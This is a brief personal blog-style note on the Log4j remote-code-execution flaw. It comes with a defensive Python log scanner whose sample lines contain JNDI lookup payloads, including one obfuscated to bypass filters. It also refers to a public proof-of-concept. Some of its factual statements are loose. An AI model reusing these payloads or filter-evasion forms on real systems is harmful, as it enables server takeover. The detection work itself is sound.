Log4j Vulnerability

Today I learnt about the Log4j vulnerability. Log4j is a powerful library, which is why it is used by most companies, such as Cisco, Apple, Android, etc. A hacker can perform a remote code execution (RCE) and gain control of the server. The string that triggers the vulnerability is placed through an app, and it is not limited: it works on all operating systems. The string is put in a card ID, as part of your track data. The vulnerability has a CVSS score of 10 and is easy to exploit.

N.B.: People don't log passwords, just the user name.

Different things to check out:
a) Message lookup substitution.
b) WAF (Web Application Firewall); you will see they can also be easily bypassed.
c) A command: log4J-shell-poc/ (look on GitHub).
d) Static Application Security Testing (SAST).
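
A defender-side check for items a) and b), added here as an example that is not part of the original post: it resolves nested lookups before searching logged user names for a JNDI lookup, and compares that with a literal match. It assumes the lookup string has the `${jndi:...}` form and that logs carry the user name as `user=<value>`; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Lookups that simply return their argument: ${lower:X}, ${upper:X}
_CASE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# Default-value form: ${key:-X} resolves to X when the key is not set
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)
_USER = re.compile(r"\buser=(\S+)")  # assumed log field layout

# Constructed sample log lines (not from a real system)
SAMPLE_LOG = [
    "09:14:02 INFO  login ok user=alice",
    "09:14:07 WARN  login failed user=${jndi:ldap://example.invalid/a}",
    "09:14:09 WARN  login failed user=${${lower:j}ndi:ldap://example.invalid/a}",
    "09:14:11 INFO  login ok user=bob",
]

def naive_match(line):
    """Literal match, the way a simple filter rule would do it."""
    return "${jndi:" in line.lower()

def normalize(text, max_rounds=10):
    """URL-decode, then collapse innermost lookups until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):  # bounded so odd input cannot loop forever
        new = _CASE.sub(r"\1", text)
        new = _DEFAULT.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text

def is_suspicious(value):
    """True if the value contains a JNDI lookup once nesting is resolved."""
    return bool(_JNDI.search(normalize(value)))

def scan(lines):
    """Return 1-based numbers of lines whose user= field carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _USER.search(line)
        if m and is_suspicious(m.group(1)):
            hits.append(n)
    return hits

if __name__ == "__main__":
    print("literal match:", [n for n, l in enumerate(SAMPLE_LOG, 1) if naive_match(l)])
    print("normalized   :", scan(SAMPLE_LOG))
```

The literal match misses the third sample line, which is why a filter rule alone is not a fix and the library itself has to be patched or have message lookups disabled.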